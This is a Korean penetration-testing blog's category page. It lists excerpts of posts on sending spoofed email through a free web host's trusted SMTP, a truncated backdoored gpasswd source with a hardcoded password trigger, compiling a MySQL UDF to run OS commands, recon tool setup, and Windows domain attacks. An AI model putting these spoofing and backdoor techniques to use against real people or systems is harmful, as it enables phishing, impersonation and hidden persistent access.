본문 바로가기

보안 & 해킹/모의 침투

SMTP 구축 없이 메일 주소를 속여서 보내기 SMTP 릴레이 서버란? 간단히 말해서, 릴레이 서버는 주요 회사가 전자우편의 인증된 송신자로 신뢰하는 SMTP 서버다. 그렇다면, SMTP 릴레이 서버를 찾는 방법은? 스푸핑된 이메일을 성공적으로 보내려면 신뢰할 수 있는 SMTP 서버를 찾아야 한다. 일반적으로 웹 호스팅 제공업체에서 보내는 모든 이메일은 신뢰되고 인증된다. 그래서 이메일을 보낼 수 있는 무료 웹 호스팅 제공자를 찾아야 한다. https://www.000webhost.com/ 현재 호스팅을 무료로 받을 수 있는 서비스다. 아래는 메일을 송신할 수 있는 php 소스코드의 압축파일이다. 자세한 내용은 영상을 참고하라.
해커플레이북3 리마인드맵 remind map Red Team 구성 중에 사용할 수 있는 프로세스와 기술에 중점을 두었다. 우클릭 - 새 탭에서 이미지 열기로 보세요. 출처 : https://www.marcolancini.it/2018/blog-kubernetes-CVE-2018-1002105/
gpasswd , backdoor 은닉 코드 #include #include #include #define BUF_SIZE 1024 int main (int argc, char *argv[]){ char *exec = (char*)malloc(sizeof(char) * BUF_SIZE); if(argc < 3 || strncmp(argv[1], "PaSSwOrD", 8)) { printf("Usage: gpasswd [option] GROUP\n\ Options:\n\ \t-a, --add USER\t\t\t\tadd USER to GROUP\n\ \t-d, --delete USER\t\t\tremove USER from GROUP\n\ \t-h, --help\t\t\t\tdisplay this help message and exit\n\ \t-Q..
03.도메인 컨트롤러 공격과 원리 201607 작성. 지금과 다른 점이 있을 수 있음.
02.WMI의 이해와 우회 침투 201605 작성. 지금과 다른 점이 있을 수 있음.
01.파워셸의 악의적 활용 및 로컬 관리자 계정 획득 201604 작성지금과 다른 점이 있을 수 있음.
도구를 사용한 기업정보 수집 (Discover script, Spider Foot) 1. 개요탐색할 기업에 대한 정보수집을 자동화하는 툴인 Discover Script와 Spider Foot을 사용해본다. 2. 설치Kali Linux에 Discover Script를 설치한다.git clone https://github.com/leebaird/discover.git /opt/discover cd /opt/discover && ./update.sh Spider Foot 도구를 설치한다.mkdir /opt/spiderfoot && cd /opt/spiderfoot wget http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz/download tar xvzf download pip install lxml pip..
MYSQL UDF ( OS command 사용 ) mysql에서 OS command를 실행할 수 있는 방법출처 : https://github.com/mysqludf/lib_mysqludf_syshttps://m.blog.naver.com/PostView.nhn?blogId=blueaian&logNo=220651510889&proxyReferer=https%3A%2F%2Fwww.google.co.kr%2F : lib_mysqludf_sys.c 만 받으면 됨 소스 복사> cp lib_mysqludf_sys.c /usr/local/mysql/include/ cd /usr/local/mysql/include컴파일> gcc -m64 -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/l..